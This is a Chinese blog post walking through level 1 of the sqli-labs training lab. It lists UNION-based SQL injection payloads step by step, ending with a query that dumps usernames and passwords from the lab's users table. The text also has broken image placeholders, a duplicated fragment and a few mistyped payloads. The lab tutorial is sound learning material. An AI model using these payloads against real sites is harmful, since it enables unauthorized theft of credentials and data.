sqli-labs 第一关

最新推荐文章于 2024-04-08 12:00:56 发布
最新推荐文章于 2024-04-08 12:00:56 发布
阅读量765 收藏 1
点赞数 2
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48800344/article/details/117253583
版权

sql注入大体解释

通过构造闭合语句来执行想要执行的命令

第一关

推荐工具 HackBar

为什么不用url输入,做着做着就不知道代码那里出错了,用hackber方便简洁,其实url输入也行

第一步:判断什么型的注入

1.判断是什么型注入就要看给他错误语句是否报错

例如:判断什么型注入直接看1’ and 1=2# 1 and 1=2#那个会报错

详细因为当运行可执行指令中假如程序有错误语句会报错,如果可执行程序中有错误语句但没报错就可以看出来了

我是这么理解的,希望有更好的解释

[外链图片转存失败在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XI1c3CeV-1621917849450)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image002.jpg)]

错误语句回显正确信息

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aWbtfKSM-1621917849454)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image004.jpg)]

错误语句不回显正确信息

从这里就可以判断出它是一个字符型注入了

Tips:注释:

#

–+

%23 url编码

第二步:爆破字段

为什么要爆破字段?

因为只有爆破字段我们才知道select后面有几个查询点,在通过union联合查询通过构造闭合语句来进行查看信息

order by 1–+ 然后把1换2.连续换,慢慢试,当使用这条指令出现以下信息就可以知道这道题有三个字段

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-t2d6BvXY-1621917849456)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image006.jpg)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8QN67IFF-1621917849458)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image008.jpg)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KDoryQfP-1621917849460)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image010.jpg)]

第三步:构造Union语句查看

\1. -1’ union select 1,2,3–+ 寻找插入点

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-njHoo45W-1621917849462)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image012.jpg)]

\2. -1’ union select 1,database(),version()–+ 查看数据库和版本信息

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LA4tmUao-1621917849463)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image014.jpg)]

这里我们知道当前数据库名字是 security 版本是5.7.26

3.-这里我们就用到了group_concat()

group_concat():用来处理一对多的查询结果

可以了解以下information_schema数据库,这里不多做解释

-1’ union select 1,group_concat(schema_name).3 from information_schema.schemata–+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KBcO0UAL-1621917849464)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image016.jpg)]

这就获取到我们所有的数据库名称

4.-1’ union select 1,group_concat(table_name),3 from information_schema. where table_schema=“security”–+

获取当前数据库的所有表名

tips 最后面要加”

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-csLmoCIq-1621917849464)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image018.jpg)]

5.-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=” security”–+获取所有列名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-32Sx3NVi-1621917849465)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image020.jpg)]

6.-1’ union select 1,group_concat(concat(0x7e,username,password)),3 from security.users–+

获取所有账号和密码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sPd5tBJo-1621917849466)(file:///C:/Users/ADMINI~1/AppData/Local/Temp/msohtmlclip1/01/clip_image022.jpg)]

Concat_ws:指定参数之间的分隔符

ecurity.users–+

获取所有账号和密码

[外链图片转存中…(img-sPd5tBJo-1621917849466)]

Concat_ws:指定参数之间的分隔符

至此第一关结束了

weixin_48800344
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
sqli-labs第一关的闯关
qq_45154529的博客
01-05 2042
第一关:单引号错误 SQL的注入最终是为了拿到数据库的文件或者数据。 刚进页面,显示需要输入id。 于是我们使用在地址栏后面加上 ?id=1 第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。 如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句 echo “$sql” 判断有无注入点: 老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 2万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
Sqli-lab教程-史上最全详解(1-22通关)_sqlilabs(1)
最新发布
m0_60721649的博客
04-08 792
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sqli-labs靶场1-5关
2302_80044238的博客
01-27 1107
输入:(解析:updatexml()是一个用于修改XML数据的SQL函数 1 是XML中的路径,concat()用于将0x7e和selectdatabase()函数拼接起来,0x7e是十六进制表示~特殊符号会导致查询出错从而爆出数据 (0x7e也可使用其他符号代替但是需要加上单引号))当我们尝试不闭合还有单引号闭合两种方法时发现页面反馈给我们的时sql语法不正确也就是我们所注入的sql攻击语句是无法执行的,此时我们可以去看看此网页的源代码(可以直接在小皮的根目录里面找对应的关卡就可以找到)
SQLI-LABS 01.第一关 【显错注入_单引号闭合】
weixin_45284414的博客
05-15 297
首先主动输入一个单引号提前闭合,最后-- x注释掉后边内容。中间可以构造使用AND OR 拼接语句进行探测。01.第一关 【显错注入_单引号闭合】)利用常规的显错注入去做题。
sqli-labs靶场第一关详解
qq_43784516的博客
01-28 1146
sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
安装sqli-labs
10-22
sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli-labs之前,需要了解为什么要使用本地Web靶场。随着网络安全威胁的增加...
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqli-labs靶场第一关
weixin_72583035的博客
01-30 416
这是一个语法报错,因为在所有语句中单双引号必须成对出现,我们加了一个单引号就让我们从单引号里逃逸出来了,我们再加的单引号后面写语句就是我们能控制的了,但是里面还是有三个单引号,所有我们要想办法注释后面的语句或者让单引号成对。我们找到了我们的库名security现在就要找表名了,我们要构造查询列表名,information_schema.table存储了数据库中的所有表的信息。用order by 排序时用二分法排序,这里因为这个数据库的列比较少就不演示了,我们排出来数据库有3列。这样就可以过第一关了;
sqli_labs第一关
weixin_30924087的博客
03-25 199
安装 从https://github.com/Audi-1/sqli-labs下载源代码 搭建环境用的是phpstudy 编辑sqli\sql-connections\db-creds.inc文件 修改mysql链接数据库帐号密码。 为了方便看见sql语句,在$sql这句话下面添加echo...这句。 $sql="SELECT * FROM users WHERE id='...
sqlilabs通关——第一关
liuzhen9828的博客
09-22 284
从上边的页面提示中可以看出,ID是其参数 1.判断漏洞 首先根据题目就可以知道这是一个单引号字符型注入漏洞 其次我们可以进行手工判断,输入id=1 and 1=2发现页面显示正常,说明肯定不是数字型,输入id=1'发现页面错误,但是有一个提示limit 0,1'说明后边的单引号没有闭合造成了错误,这就可以说明这是一个单引号引起的漏洞。输入id=1'--+页面正常。 2.漏洞利用 漏洞利用的思路和常规的MySQL一样,为了练习,这里使用手工注入。 判断字段数 id=1' order by 3--+页面.
SQLI-LABS(一)
weixin_51075988的博客
11-23 1322
SQLI-LABS (一) 学习前的准备: sql是什么? sql注入:在web应用程序事先定义好的查询语句结尾添加额外SQL语句, 欺骗数据库服务器执行非授权的任意查询,得到相应的数据信息,进行提权等; 2、搭建sqli-labs(可以使用phpstudy搭建); 3、学会在 mysql命令行 中进行 mysql的基本用法 ; mysql命令行的具体打开方法:找到\phpstudy_pro\extensions\mysql5.7.26\bin ,在Windows命令中进入bin中,输入"mysql -u
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 404
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
sqli-labs一第一关详细步骤,新手打基础篇
qq_50956249的博客
03-21 555
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…union 1,2,group_concat(column_name),…7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数。输入1’–+,有用户显示。输入 1,有用户显示。
sqli-labs 1-10(GET型注入)新手通关详解(高手误入)
b1n的博客
07-16 2741
1.第一关是单引号字符型注入2.用--+进行注释,页面正常显示。
sqli-labs第一关
07-28
sqli-labs第一关中,你需要找到一个可以进行SQL注入的输入点,并尝试通过注入恶意的SQL代码来绕过应用程序的验证机制,获取隐藏的信息或执行任意操作。 请注意,sqli-labs是一个合法的学习平台,但请不要将所学到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weixin_48800344

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值